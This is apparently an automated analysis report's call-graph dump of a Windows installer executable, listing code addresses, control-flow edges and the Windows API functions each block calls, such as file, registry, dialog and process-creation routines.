4104 4019da lstrlenW 4103->4104 4103->4105 4104->4105 4106->4103 4107 40166a 4108 402da6 17 API calls 4107->4108 4109 401670 4108->4109 4110 406873 2 API calls 4109->4110 4111 401676 4110->4111 4112 402aeb 4113 402d84 17 API calls 4112->4113 4114 402af1 4113->4114 4115 40657a 17 API calls 4114->4115 4116 40292e 4114->4116 4115->4116 4117 4026ec 4118 402d84 17 API calls 4117->4118 4125 4026fb 4118->4125 4119 402838 4120 402745 ReadFile 4120->4119 4120->4125 4121 4060b0 ReadFile 4121->4125 4123 402785 MultiByteToWideChar 4123->4125 4124 40283a 4139 406484 wsprintfW 4124->4139 4125->4119 4125->4120 4125->4121 4125->4123 4125->4124 4127 4027ab SetFilePointer MultiByteToWideChar 4125->4127 4128 40284b 4125->4128 4130 40610e SetFilePointer 4125->4130 4127->4125 4128->4119 4129 40286c SetFilePointer 4128->4129 4129->4119 4131 40612a 4130->4131 4134 406142 4130->4134 4132 4060b0 ReadFile 4131->4132 4133 406136 4132->4133 4133->4134 4135 406173 SetFilePointer 4133->4135 4136 40614b SetFilePointer 4133->4136 4134->4125 4135->4134 4136->4135 4137 406156 4136->4137 4138 4060df WriteFile 4137->4138 4138->4134 4139->4119 3634 40176f 3635 402da6 17 API calls 3634->3635 3636 401776 3635->3636 3637 401796 3636->3637 3638 40179e 3636->3638 3673 40653d lstrcpynW 3637->3673 3674 40653d lstrcpynW 3638->3674 3641 40179c 3645 4067c4 5 API calls 3641->3645 3642 4017a9 3643 405e0c 3 API calls 3642->3643 3644 4017af lstrcatW 3643->3644 3644->3641 3662 4017bb 3645->3662 3646 406873 2 API calls 3646->3662 3647 406008 2 API calls 3647->3662 3649 4017cd CompareFileTime 3649->3662 3650 40188d 3652 40559f 24 API calls 3650->3652 3651 401864 3653 40559f 24 API calls 3651->3653 3657 401879 3651->3657 3655 401897 3652->3655 3653->3657 3654 40653d lstrcpynW 3654->3662 3656 4032b4 31 API calls 3655->3656 3658 4018aa 3656->3658 3659 4018be SetFileTime 3658->3659 3660 4018d0 CloseHandle 3658->3660 3659->3660 3660->3657 3663 4018e1 3660->3663 3661 40657a 17 API calls 3661->3662 3662->3646 3662->3647 3662->3649 3662->3650 3662->3651 3662->3654 3662->3661 3668 405b9d MessageBoxIndirectW 3662->3668 3672 40602d GetFileAttributesW CreateFileW 3662->3672 3664 4018e6 3663->3664 3665 4018f9 3663->3665 3666 40657a 17 API calls 3664->3666 3667 40657a 17 API calls 3665->3667 3669 4018ee lstrcatW 3666->3669 3670 401901 3667->3670 3668->3662 3669->3670 3671 405b9d MessageBoxIndirectW 3670->3671 3671->3657 3672->3662 3673->3641 3674->3642 4140 401a72 4141 402d84 17 API calls 4140->4141 4142 401a7b 4141->4142 4143 402d84 17 API calls 4142->4143 4144 401a20 4143->4144 4145 401573 4146 401583 ShowWindow 4145->4146 4147 40158c 4145->4147 4146->4147 4148 402c2a 4147->4148 4149 40159a ShowWindow 4147->4149 4149->4148 4150 4023f4 4151 402da6 17 API calls 4150->4151 4152 402403 4151->4152 4153 402da6 17 API calls 4152->4153 4154 40240c 4153->4154 4155 402da6 17 API calls 4154->4155 4156 402416 GetPrivateProfileStringW 4155->4156 4157 4014f5 SetForegroundWindow 4158 402c2a 4157->4158 4159 401ff6 4160 402da6 17 API calls 4159->4160 4161 401ffd 4160->4161 4162 406873 2 API calls 4161->4162 4163 402003 4162->4163 4165 402014 4163->4165 4166 406484 wsprintfW 4163->4166 4166->4165 4167 401b77 4168 402da6 17 API calls 4167->4168 4169 401b7e 4168->4169 4170 402d84 17 API calls 4169->4170 4171 401b87 wsprintfW 4170->4171 4172 402c2a 4171->4172 4173 40167b 4174 402da6 17 API calls 4173->4174 4175 401682 4174->4175 4176 402da6 17 API calls 4175->4176 4177 40168b 4176->4177 4178 402da6 17 API calls 4177->4178 4179 401694 MoveFileW 4178->4179 4180 4016a7 4179->4180 4186 4016a0 4179->4186 4182 406873 2 API calls 4180->4182 4184 4022f6 4180->4184 4181 401423 24 API calls 4181->4184 4183 4016b6 4182->4183 4183->4184 4185 4062fd 36 API calls 4183->4185 4185->4186 4186->4181 4187 4019ff 4188 402da6 17 API calls 4187->4188 4189 401a06 4188->4189 4190 402da6 17 API calls 4189->4190 4191 401a0f 4190->4191 4192 401a16 lstrcmpiW 4191->4192 4193 401a28 lstrcmpW 4191->4193 4194 401a1c 4192->4194 4193->4194 4195 4022ff 4196 402da6 17 API calls 4195->4196 4197 402305 4196->4197 4198 402da6 17 API calls 4197->4198 4199 40230e 4198->4199 4200 402da6 17 API calls 4199->4200 4201 402317 4200->4201 4202 406873 2 API calls 4201->4202 4203 402320 4202->4203 4204 402331 lstrlenW lstrlenW 4203->4204 4208 402324 4203->4208 4205 40559f 24 API calls 4204->4205 4207 40236f SHFileOperationW 4205->4207 4206 40559f 24 API calls 4209 40232c 4206->4209 4207->4208 4207->4209 4208->4206 4208->4209 4210 401000 4211 401037 BeginPaint GetClientRect 4210->4211 4212 40100c DefWindowProcW 4210->4212 4214 4010f3 4211->4214 4217 401179 4212->4217 4215 401073 CreateBrushIndirect FillRect DeleteObject 4214->4215 4216 4010fc 4214->4216 4215->4214 4218 401102 CreateFontIndirectW 4216->4218 4219 401167 EndPaint 4216->4219 4218->4219 4220 401112 6 API calls 4218->4220 4219->4217 4220->4219 4221 401d81 4222 401d94 GetDlgItem 4221->4222 4223 401d87 4221->4223 4225 401d8e 4222->4225 4224 402d84 17 API calls 4223->4224 4224->4225 4226 402da6 17 API calls 4225->4226 4229 401dd5 GetClientRect LoadImageW SendMessageW 4225->4229 4226->4229 4228 401e33 4230 401e38 DeleteObject 4228->4230 4231 401e3f 4228->4231 4229->4228 4229->4231 4230->4231 4232 401503 4233 40150b 4232->4233 4235 40151e 4232->4235 4234 402d84 17 API calls 4233->4234 4234->4235 4236 402383 4237 40238a 4236->4237 4240 40239d 4236->4240 4238 40657a 17 API calls 4237->4238 4239 402397 4238->4239 4241 405b9d MessageBoxIndirectW 4239->4241 4241->4240 4242 402c05 SendMessageW 4243 402c2a 4242->4243 4244 402c1f InvalidateRect 4242->4244 4244->4243 3194 404f06 GetDlgItem GetDlgItem 3195 404f58 7 API calls 3194->3195 3202 40517d 3194->3202 3196 404ff2 SendMessageW 3195->3196 3197 404fff DeleteObject 3195->3197 3196->3197 3198 405008 3197->3198 3199 40503f 3198->3199 3203 40657a 17 API calls 3198->3203 3249 404499 3199->3249 3200 40525f 3205 40530b 3200->3205 3211 4054fe 3200->3211 3216 4052b8 SendMessageW 3200->3216 3201 405240 3201->3200 3212 405251 SendMessageW 3201->3212 3202->3200 3202->3201 3208 4051db 3202->3208 3209 405021 SendMessageW SendMessageW 3203->3209 3206 405315 SendMessageW 3205->3206 3207 40531d 3205->3207 3206->3207 3218 405336 3207->3218 3219 40532f ImageList_Destroy 3207->3219 3235 405346 3207->3235 3257 404e54 SendMessageW 3208->3257 3209->3198 3210 405053 3215 404499 18 API calls 3210->3215 3271 404500 3211->3271 3212->3200 3230 405064 3215->3230 3216->3211 3221 4052cd SendMessageW 3216->3221 3222 40533f GlobalFree 3218->3222 3218->3235 3219->3218 3220 4054c0 3220->3211 3225 4054d2 ShowWindow GetDlgItem ShowWindow 3220->3225 3224 4052e0 3221->3224 3222->3235 3223 40513f GetWindowLongW SetWindowLongW 3226 405158 3223->3226 3236 4052f1 SendMessageW 3224->3236 3225->3211 3227 405175 3226->3227 3228 40515d ShowWindow 3226->3228 3256 4044ce SendMessageW 3227->3256 3255 4044ce SendMessageW 3228->3255 3229 4051ec 3229->3201 3230->3223 3231 40513a 3230->3231 3234 4050b7 SendMessageW 3230->3234 3238 4050f5 SendMessageW 3230->3238 3239 405109 SendMessageW 3230->3239 3231->3223 3231->3226 3234->3230 3235->3220 3242 405381 3235->3242 3262 404ed4 3235->3262 3236->3205 3237 405170 3237->3211 3238->3230 3239->3230 3241 40548b 3243 405496 InvalidateRect 3241->3243 3246 4054a2 3241->3246 3244 4053af SendMessageW 3242->3244 3245 4053c5 3242->3245 3243->3246 3244->3245 3245->3241 3247 405439 SendMessageW SendMessageW 3245->3247 3246->3220 3252 404e0f 3246->3252 3247->3245 3250 40657a 17 API calls 3249->3250 3251 4044a4 SetDlgItemTextW 3250->3251 3251->3210 3285 404d46 3252->3285 3254 404e24 3254->3220 3255->3237 3256->3202 3258 404eb3 SendMessageW 3257->3258 3259 404e77 GetMessagePos ScreenToClient SendMessageW 3257->3259 3261 404eab 3258->3261 3260 404eb0 3259->3260 3259->3261 3260->3258 3261->3229 3293 40653d lstrcpynW 3262->3293 3264 404ee7 3294 406484 wsprintfW 3264->3294 3266 404ef1 3295 40140b 3266->3295 3270 404f01 3270->3242 3272 4045c3 3271->3272 3273 404518 GetWindowLongW 3271->3273 3273->3272 3274 40452d 3273->3274 3274->3272 3275 40455a GetSysColor 3274->3275 3276 40455d 3274->3276 3275->3276 3277 404563 SetTextColor 3276->3277 3278 40456d SetBkMode 3276->3278 3277->3278 3279 404585 GetSysColor 3278->3279 3280 40458b 3278->3280 3279->3280 3281 404592 SetBkColor 3280->3281 3282 40459c 3280->3282 3281->3282 3282->3272 3283 4045b6 CreateBrushIndirect 3282->3283 3284 4045af DeleteObject 3282->3284 3283->3272 3284->3283 3286 404d5f 3285->3286 3287 40657a 17 API calls 3286->3287 3288 404dc3 3287->3288 3289 40657a 17 API calls 3288->3289 3290 404dce 3289->3290 3291 40657a 17 API calls 3290->3291 3292 404de4 lstrlenW wsprintfW SetDlgItemTextW 3291->3292 3292->3254 3293->3264 3294->3266 3299 401389 3295->3299 3298 40653d lstrcpynW 3298->3270 3301 401390 3299->3301 3300 4013fe 3300->3298 3301->3300 3302 4013cb MulDiv SendMessageW 3301->3302 3302->3301 4245 404609 lstrlenW 4246 404628 4245->4246 4247 40462a WideCharToMultiByte 4245->4247 4246->4247 3303 40248a 3304 402da6 17 API calls 3303->3304 3305 40249c 3304->3305 3306 402da6 17 API calls 3305->3306 3307 4024a6 3306->3307 3320 402e36 3307->3320 3310 40292e 3311 4024de 3313 4024ea 3311->3313 3315 402d84 17 API calls 3311->3315 3312 402da6 17 API calls 3314 4024d4 lstrlenW 3312->3314 3316 402509 RegSetValueExW 3313->3316 3324 4032b4 3313->3324 3314->3311 3315->3313 3317 40251f RegCloseKey 3316->3317 3317->3310 3321 402e51 3320->3321 3344 4063d8 3321->3344 3325 4032cd 3324->3325 3326 4032fb 3325->3326 3351 4034e5 SetFilePointer 3325->3351 3348 4034cf 3326->3348 3330 403468 3332 4034aa 3330->3332 3336 40346c 3330->3336 3331 403318 GetTickCount 3338 403452 3331->3338 3343 403367 3331->3343 3333 4034cf ReadFile 3332->3333 3333->3338 3334 4034cf ReadFile 3334->3343 3335 4034cf ReadFile 3335->3336 3336->3335 3337 4060df WriteFile 3336->3337 3336->3338 3337->3336 3338->3316 3339 4033bd GetTickCount 3339->3343 3340 4033e2 MulDiv wsprintfW 3341 40559f 24 API calls 3340->3341 3341->3343 3342 4060df WriteFile 3342->3343 3343->3334 3343->3338 3343->3339 3343->3340 3343->3342 3345 4063e7 3344->3345 3346 4063f2 RegCreateKeyExW 3345->3346 3347 4024b6 3345->3347 3346->3347 3347->3310 3347->3311 3347->3312 3349 4060b0 ReadFile 3348->3349 3350 403306 3349->3350 3350->3330 3350->3331 3350->3338 3351->3326 4248 40498a 4249 4049b6 4248->4249 4250 4049c7 4248->4250 4309 405b81 GetDlgItemTextW 4249->4309 4252 4049d3 GetDlgItem 4250->4252 4257 404a32 4250->4257 4254 4049e7 4252->4254 4253 4049c1 4256 4067c4 5 API calls 4253->4256 4259 4049fb SetWindowTextW 4254->4259 4264 405eb7 4 API calls 4254->4264 4255 404b16 4307 404cc5 4255->4307 4311 405b81 GetDlgItemTextW 4255->4311 4256->4250 4257->4255 4261 40657a 17 API calls 4257->4261 4257->4307 4262 404499 18 API calls 4259->4262 4260 404b46 4265 405f14 18 API calls 4260->4265 4266 404aa6 SHBrowseForFolderW 4261->4266 4267 404a17 4262->4267 4263 404500 8 API calls 4268 404cd9 4263->4268 4269 4049f1 4264->4269 4270 404b4c 4265->4270 4266->4255 4271 404abe CoTaskMemFree 4266->4271 4272 404499 18 API calls 4267->4272 4269->4259 4273 405e0c 3 API calls 4269->4273 4312 40653d lstrcpynW 4270->4312 4274 405e0c 3 API calls 4271->4274 4275 404a25 4272->4275 4273->4259 4276 404acb 4274->4276 4310 4044ce SendMessageW 4275->4310 4279 404b02 SetDlgItemTextW 4276->4279 4284 40657a 17 API calls 4276->4284 4279->4255 4280 404a2b 4282 40690a 5 API calls 4280->4282 4281 404b63 4283 40690a 5 API calls 4281->4283 4282->4257 4291 404b6a 4283->4291 4285 404aea lstrcmpiW 4284->4285 4285->4279 4288 404afb lstrcatW 4285->4288 4286 404bab 4313 40653d lstrcpynW 4286->4313 4288->4279 4289 404bb2 4290 405eb7 4 API calls 4289->4290 4292 404bb8 GetDiskFreeSpaceW 4290->4292 4291->4286 4294 405e58 2 API calls 4291->4294 4296 404c03 4291->4296 4295 404bdc MulDiv 4292->4295 4292->4296 4294->4291 4295->4296 4297 404c74 4296->4297 4298 404e0f 20 API calls 4296->4298 4299 404c97 4297->4299 4300 40140b 2 API calls 4297->4300 4301 404c61 4298->4301 4314 4044bb KiUserCallbackDispatcher 4299->4314 4300->4299 4303 404c76 SetDlgItemTextW 4301->4303 4304 404c66 4301->4304 4303->4297 4306 404d46 20 API calls 4304->4306 4305 404cb3 4305->4307 4308 4048e3 SendMessageW 4305->4308 4306->4297 4307->4263 4308->4307 4309->4253 4310->4280 4311->4260 4312->4281 4313->4289 4314->4305 3385 40290b 3386 402da6 17 API calls 3385->3386 3387 402912 FindFirstFileW 3386->3387 3388 40293a 3387->3388 3392 402925 3387->3392 3393 406484 wsprintfW 3388->3393 3390 402943 3394 40653d lstrcpynW 3390->3394 3393->3390 3394->3392 4315 40190c 4316 401943 4315->4316 4317 402da6 17 API calls 4316->4317 4318 401948 4317->4318 4319 405c49 67 API calls 4318->4319 4320 401951 4319->4320 4321 40190f 4322 402da6 17 API calls 4321->4322 4323 401916 4322->4323 4324 405b9d MessageBoxIndirectW 4323->4324 4325 40191f 4324->4325 3705 402891 3706 402898 3705->3706 3708 402ba9 3705->3708 3707 402d84 17 API calls 3706->3707 3709 40289f 3707->3709 3710 4028ae SetFilePointer 3709->3710 3710->3708 3711 4028be 3710->3711 3713 406484 wsprintfW 3711->3713 3713->3708 4326 401491 4327 40559f 24 API calls 4326->4327 4328 401498 4327->4328 3714 403b12 3715 403b2a 3714->3715 3716 403b1c CloseHandle 3714->3716 3721 403b57 3715->3721 3716->3715 3719 405c49 67 API calls 3720 403b3b 3719->3720 3723 403b65 3721->3723 3722 403b2f 3722->3719 3723->3722 3724 403b6a FreeLibrary GlobalFree 3723->3724 3724->3722 3724->3724 4329 401f12 4330 402da6 17 API calls 4329->4330 4331 401f18 4330->4331 4332 402da6 17 API calls 4331->4332 4333 401f21 4332->4333 4334 402da6 17 API calls 4333->4334 4335 401f2a 4334->4335 4336 402da6 17 API calls 4335->4336 4337 401f33 4336->4337 4338 401423 24 API calls 4337->4338 4339 401f3a 4338->4339 4346 405b63 ShellExecuteExW 4339->4346 4341 401f82 4342 40292e 4341->4342 4343 4069b5 5 API calls 4341->4343 4344 401f9f CloseHandle 4343->4344 4344->4342 4346->4341 3725 405513 3726 405523 3725->3726 3727 405537 3725->3727 3728 405580 3726->3728 3729 405529 3726->3729 3730 40553f IsWindowVisible 3727->3730 3737 40555f 3727->3737 3731 405585 CallWindowProcW 3728->3731 3732 4044e5 SendMessageW 3729->3732 3730->3728 3733 40554c 3730->3733 3734 405533 3731->3734 3732->3734 3735 404e54 5 API calls 3733->3735 3736 405556 3735->3736 3736->3737 3737->3731 3738 404ed4 4 API calls 3737->3738 3738->3728 4347 402f93 4348 402fa5 SetTimer 4347->4348 4349 402fbe 4347->4349 4348->4349 4350 403013 4349->4350 4351 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4349->4351 4351->4350 4352 401d17 4353 402d84 17 API calls 4352->4353 4354 401d1d IsWindow 4353->4354 4355 401a20 4354->4355 3802 403f9a 3803 403fb2 3802->3803 3804 404113 3802->3804 3803->3804 3805 403fbe 3803->3805 3806 404164 3804->3806 3807 404124 GetDlgItem GetDlgItem 3804->3807 3808 403fc9 SetWindowPos 3805->3808 3809 403fdc 3805->3809 3811 4041be 3806->3811 3822 401389 2 API calls 3806->3822 3810 404499 18 API calls 3807->3810 3808->3809 3813 403fe5 ShowWindow 3809->3813 3814 404027 3809->3814 3815 40414e SetClassLongW 3810->3815 3812 4044e5 SendMessageW 3811->3812 3816 40410e 3811->3816 3844 4041d0 3812->3844 3817 4040d1 3813->3817 3818 404005 GetWindowLongW 3813->3818 3819 404046 3814->3819 3820 40402f DestroyWindow 3814->3820 3821 40140b 2 API calls 3815->3821 3823 404500 8 API calls 3817->3823 3818->3817 3824 40401e ShowWindow 3818->3824 3826 40404b SetWindowLongW 3819->3826 3827 40405c 3819->3827 3825 404422 3820->3825 3821->3806 3828 404196 3822->3828 3823->3816 3824->3814 3825->3816 3833 404453 ShowWindow 3825->3833 3826->3816 3827->3817 3831 404068 GetDlgItem 3827->3831 3828->3811 3832 40419a SendMessageW 3828->3832 3829 40140b 2 API calls 3829->3844 3830 404424 DestroyWindow KiUserCallbackDispatcher 3830->3825 3834 404096 3831->3834 3835 404079 SendMessageW IsWindowEnabled 3831->3835 3832->3816 3833->3816 3837 4040a3 3834->3837 3838 4040ea SendMessageW 3834->3838 3839 4040b6 3834->3839 3847 40409b 3834->3847 3835->3816 3835->3834 3836 40657a 17 API calls 3836->3844 3837->3838 3837->3847 3838->3817 3842 4040d3 3839->3842 3843 4040be 3839->3843 3841 404499 18 API calls 3841->3844 3846 40140b 2 API calls 3842->3846 3845 40140b 2 API calls 3843->3845 3844->3816 3844->3829 3844->3830 3844->3836 3844->3841 3848 404499 18 API calls 3844->3848 3864 404364 DestroyWindow 3844->3864 3845->3847 3846->3847 3847->3817 3876 404472 3847->3876 3849 40424b GetDlgItem 3848->3849 3850 404260 3849->3850 3851 404268 ShowWindow KiUserCallbackDispatcher 3849->3851 3850->3851 3873 4044bb KiUserCallbackDispatcher 3851->3873 3853 404292 KiUserCallbackDispatcher 3858 4042a6 3853->3858 3854 4042ab GetSystemMenu EnableMenuItem SendMessageW 3855 4042db SendMessageW 3854->3855 3854->3858 3855->3858 3857 403f7b 18 API calls 3857->3858 3858->3854 3858->3857 3874 4044ce SendMessageW 3858->3874 3875 40653d lstrcpynW 3858->3875 3860 40430a lstrlenW 3861 40657a 17 API calls 3860->3861 3862 404320 SetWindowTextW 3861->3862 3863 401389 2 API calls 3862->3863 3863->3844 3864->3825 3865 40437e CreateDialogParamW 3864->3865 3865->3825 3866 4043b1 3865->3866 3867 404499 18 API calls 3866->3867 3868 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3867->3868 3869 401389 2 API calls 3868->3869 3870 404402 3869->3870 3870->3816 3871 40440a ShowWindow 3870->3871 3872 4044e5 SendMessageW 3871->3872 3872->3825 3873->3853 3874->3858 3875->3860 3877 404479 3876->3877 3878 40447f SendMessageW 3876->3878 3877->3878 3878->3817 3879 401b9b 3880 401ba8 3879->3880 3881 401bec 3879->3881 3884 401c31 3880->3884 3889 401bbf 3880->3889 3882 401bf1 3881->3882 3883 401c16 GlobalAlloc 3881->3883 3895 40239d 3882->3895 3900 40653d lstrcpynW 3882->3900 3886 40657a 17 API calls 3883->3886 3885 40657a 17 API calls 3884->3885 3884->3895 3887 402397 3885->3887 3886->3884 3892 405b9d MessageBoxIndirectW 3887->3892 3898 40653d lstrcpynW 3889->3898 3890 401c03 GlobalFree 3890->3895 3892->3895 3893 401bce 3899 40653d lstrcpynW 3893->3899 3896 401bdd 3901 40653d lstrcpynW 3896->3901 3898->3893 3899->3896 3900->3890 3901->3895 4356 40261c 4357 402da6 17 API calls 4356->4357 4358 402623 4357->4358 4361 40602d GetFileAttributesW CreateFileW 4358->4361 4360 40262f 4361->4360 3964 40259e 3965 402de6 17 API calls 3964->3965 3966 4025a8 3965->3966 3967 402d84 17 API calls 3966->3967 3968 4025b1 3967->3968 3969 40292e 3968->3969 3970 4025d9 RegEnumValueW 3968->3970 3971 4025cd RegEnumKeyW 3968->3971 3972 4025ee 3970->3972 3973 4025f5 RegCloseKey 3970->3973 3971->3973 3972->3973 3973->3969 4362 40149e 4363 4014ac PostQuitMessage 4362->4363 4364 40239d 4362->4364 4363->4364 4365 4015a3 4366 402da6 17 API calls 4365->4366 4367 4015aa SetFileAttributesW 4366->4367 4368 4015bc 4367->4368 3168 401fa4 3169 402da6 17 API calls 3168->3169 3170 401faa 3169->3170 3171 40559f 24 API calls 3170->3171 3172 401fb4 3171->3172 3181 405b20 CreateProcessW 3172->3181 3175 401fdd CloseHandle 3178 40292e 3175->3178 3179 401fcf 3179->3175 3189 406484 wsprintfW 3179->3189 3182 405b53 CloseHandle 3181->3182 3183 401fba 3181->3183 3182->3183 3183->3175 3183->3178 3184 4069b5 WaitForSingleObject 3183->3184 3185 4069cf 3184->3185 3186 4069e1 GetExitCodeProcess 3185->3186 3190 406946 3185->3190 3186->3179 3189->3175 3191 406963 PeekMessageW 3190->3191 3192 406973 WaitForSingleObject 3191->3192 3193 406959 DispatchMessageW 3191->3193 3192->3185 3193->3191 3352 4021aa 3353 402da6 17 API calls 3352->3353 3354 4021b1 3353->3354 3355 402da6 17 API calls 3354->3355 3356 4021bb 3355->3356 3357 402da6 17 API calls 3356->3357 3358 4021c5 3357->3358 3359 402da6 17 API calls 3358->3359 3360 4021cf 3359->3360 3361 402da6 17 API calls 3360->3361 3362 4021d9 3361->3362 3363 402218 CoCreateInstance 3362->3363 3364 402da6 17 API calls 3362->3364 3367 402237 3363->3367 3364->3363 3365 401423 24 API calls 3366 4022f6 3365->3366 3367->3365 3367->3366 3368 40252a 3379 402de6 3368->3379 3371 402da6 17 API calls 3372 40253d 3371->3372 3373 402548 RegQueryValueExW 3372->3373 3378 40292e 3372->3378 3374 40256e RegCloseKey 3373->3374 3375 402568 3373->3375 3374->3378 3375->3374 3384 406484 wsprintfW 3375->3384 3380 402da6 17 API calls 3379->3380 3381 402dfd 3380->3381 3382 4063aa RegOpenKeyExW 3381->3382 3383 402534 3382->3383 3383->3371 3384->3374 4369 40202a 4370 402da6 17 API calls 4369->4370 4371 402031 4370->4371 4372 40690a 5 API calls 4371->4372 4373 402040 4372->4373 4374 40205c GlobalAlloc 4373->4374 4377 4020cc 4373->4377 4375 402070 4374->4375 4374->4377 4376 40690a 5 API calls 4375->4376 4378 402077 4376->4378 4379 40690a 5 API calls 4378->4379 4380 402081 4379->4380 4380->4377 4384 406484 wsprintfW 4380->4384 4382 4020ba 4385 406484 wsprintfW 4382->4385 4384->4382 4385->4377 4386 403baa 4387 403bb5 4386->4387 4388 403bbc GlobalAlloc 4387->4388 4389 403bb9 4387->4389 4388->4389 3395 40352d SetErrorMode GetVersionExW 3396 4035b7 3395->3396 3397 40357f GetVersionExW 3395->3397 3398 403610 3396->3398 3399 40690a 5 API calls 3396->3399 3397->3396 3400 40689a 3 API calls 3398->3400 3399->3398 3401 403626 lstrlenA 3400->3401 3401->3398 3402 403636 3401->3402 3403 40690a 5 API calls 3402->3403 3404 40363d 3403->3404 3405 40690a 5 API calls 3404->3405 3406 403644 3405->3406 3407 40690a 5 API calls 3406->3407 3411 403650 #17 OleInitialize SHGetFileInfoW 3407->3411 3410 40369d GetCommandLineW 3486 40653d lstrcpynW 3410->3486 3485 40653d lstrcpynW 3411->3485 3413 4036af 3414 405e39 CharNextW 3413->3414 3415 4036d5 CharNextW 3414->3415 3427 4036e6 3415->3427 3416 4037e4 3417 4037f8 GetTempPathW 3416->3417 3487 4034fc 3417->3487 3419 403810 3421 403814 GetWindowsDirectoryW lstrcatW 3419->3421 3422 40386a DeleteFileW 3419->3422 3420 405e39 CharNextW 3420->3427 3423 4034fc 12 API calls 3421->3423 3497 40307d GetTickCount GetModuleFileNameW 3422->3497 3425 403830 3423->3425 3425->3422 3428 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3425->3428 3426 40387d 3430 403a59 ExitProcess CoUninitialize 3426->3430 3432 403932 3426->3432 3440 405e39 CharNextW 3426->3440 3427->3416 3427->3420 3429 4037e6 3427->3429 3431 4034fc 12 API calls 3428->3431 3581 40653d lstrcpynW 3429->3581 3434 403a69 3430->3434 3435 403a7e 3430->3435 3439 403862 3431->3439 3525 403bec 3432->3525 3586 405b9d 3434->3586 3437 403a86 GetCurrentProcess OpenProcessToken 3435->3437 3438 403afc ExitProcess 3435->3438 3443 403acc 3437->3443 3444 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3437->3444 3439->3422 3439->3430 3454 40389f 3440->3454 3447 40690a 5 API calls 3443->3447 3444->3443 3445 403941 3445->3430 3450 403ad3 3447->3450 3448 403908 3451 405f14 18 API calls 3448->3451 3449 403949 3453 405b08 5 API calls 3449->3453 3452 403ae8 ExitWindowsEx 3450->3452 3456 403af5 3450->3456 3455 403914 3451->3455 3452->3438 3452->3456 3457 40394e lstrcatW 3453->3457 3454->3448 3454->3449 3455->3430 3582 40653d lstrcpynW 3455->3582 3460 40140b 2 API calls 3456->3460 3458 40396a lstrcatW lstrcmpiW 3457->3458 3459 40395f lstrcatW 3457->3459 3458->3445 3461 40398a 3458->3461 3459->3458 3460->3438 3463 403996 3461->3463 3464 40398f 3461->3464 3467 405aeb 2 API calls 3463->3467 3466 405a6e 4 API calls 3464->3466 3465 403927 3583 40653d lstrcpynW 3465->3583 3469 403994 3466->3469 3470 40399b SetCurrentDirectoryW 3467->3470 3469->3470 3471 4039b8 3470->3471 3472 4039ad 3470->3472 3585 40653d lstrcpynW 3471->3585 3584 40653d lstrcpynW 3472->3584 3475 40657a 17 API calls 3476 4039fa DeleteFileW 3475->3476 3477 403a06 CopyFileW 3476->3477 3482 4039c5 3476->3482 3477->3482 3478 403a50 3480 4062fd 36 API calls 3478->3480 3479 4062fd 36 API calls 3479->3482 3480->3445 3481 40657a 17 API calls 3481->3482 3482->3475 3482->3478 3482->3479 3482->3481 3483 405b20 2 API calls 3482->3483 3484 403a3a CloseHandle 3482->3484 3483->3482 3484->3482 3485->3410 3486->3413 3488 4067c4 5 API calls 3487->3488 3490 403508 3488->3490 3489 403512 3489->3419 3490->3489 3491 405e0c 3 API calls 3490->3491 3492 40351a 3491->3492 3493 405aeb 2 API calls 3492->3493 3494 403520 3493->3494 3590 40605c 3494->3590 3594 40602d GetFileAttributesW CreateFileW 3497->3594 3499 4030bd 3517 4030cd 3499->3517 3595 40653d lstrcpynW 3499->3595 3501 4030e3 3502 405e58 2 API calls 3501->3502 3503 4030e9 3502->3503 3596 40653d lstrcpynW 3503->3596 3505 4030f4 GetFileSize 3506 4031ee 3505->3506 3524 40310b 3505->3524 3597 403019 3506->3597 3508 4031f7 3510 403227 GlobalAlloc 3508->3510 3508->3517 3609 4034e5 SetFilePointer 3508->3609 3509 4034cf ReadFile 3509->3524 3608 4034e5 SetFilePointer 3510->3608 3512 40325a 3514 403019 6 API calls 3512->3514 3514->3517 3515 403210 3518 4034cf ReadFile 3515->3518 3516 403242 3519 4032b4 31 API calls 3516->3519 3517->3426 3520 40321b 3518->3520 3522 40324e 3519->3522 3520->3510 3520->3517 3521 403019 6 API calls 3521->3524 3522->3517 3522->3522 3523 40328b SetFilePointer 3522->3523 3523->3517 3524->3506 3524->3509 3524->3512 3524->3517 3524->3521 3526 40690a 5 API calls 3525->3526 3527 403c00 3526->3527 3528 403c06 3527->3528 3529 403c18 3527->3529 3625 406484 wsprintfW 3528->3625 3530 40640b 3 API calls 3529->3530 3531 403c48 3530->3531 3532 403c67 lstrcatW 3531->3532 3534 40640b 3 API calls 3531->3534 3535 403c16 3532->3535 3534->3532 3610 403ec2 3535->3610 3538 405f14 18 API calls 3539 403c99 3538->3539 3540 403d2d 3539->3540 3542 40640b 3 API calls 3539->3542 3541 405f14 18 API calls 3540->3541 3543 403d33 3541->3543 3544 403ccb 3542->3544 3545 403d43 LoadImageW 3543->3545 3548 40657a 17 API calls 3543->3548 3544->3540 3552 403cec lstrlenW 3544->3552 3556 405e39 CharNextW 3544->3556 3546 403de9 3545->3546 3547 403d6a RegisterClassW 3545->3547 3551 40140b 2 API calls 3546->3551 3549 403da0 SystemParametersInfoW CreateWindowExW 3547->3549 3550 403df3 3547->3550 3548->3545 3549->3546 3550->3445 3555 403def 3551->3555 3553 403d20 3552->3553 3554 403cfa lstrcmpiW 3552->3554 3559 405e0c 3 API calls 3553->3559 3554->3553 3558 403d0a GetFileAttributesW 3554->3558 3555->3550 3561 403ec2 18 API calls 3555->3561 3557 403ce9 3556->3557 3557->3552 3560 403d16 3558->3560 3562 403d26 3559->3562 3560->3553 3563 405e58 2 API calls 3560->3563 3564 403e00 3561->3564 3626 40653d lstrcpynW 3562->3626 3563->3553 3566 403e0c ShowWindow 3564->3566 3567 403e8f 3564->3567 3569 40689a 3 API calls 3566->3569 3618 405672 OleInitialize 3567->3618 3571 403e24 3569->3571 3570 403e95 3572 403eb1 3570->3572 3573 403e99 3570->3573 3574 403e32 GetClassInfoW 3571->3574 3578 40689a 3 API calls 3571->3578 3577 40140b 2 API calls 3572->3577 3573->3550 3580 40140b 2 API calls 3573->3580 3575 403e46 GetClassInfoW RegisterClassW 3574->3575 3576 403e5c DialogBoxParamW 3574->3576 3575->3576 3579 40140b 2 API calls 3576->3579 3577->3550 3578->3574 3579->3550 3580->3550 3581->3417 3582->3465 3583->3432 3584->3471 3585->3482 3587 405bb2 3586->3587 3588 405bc6 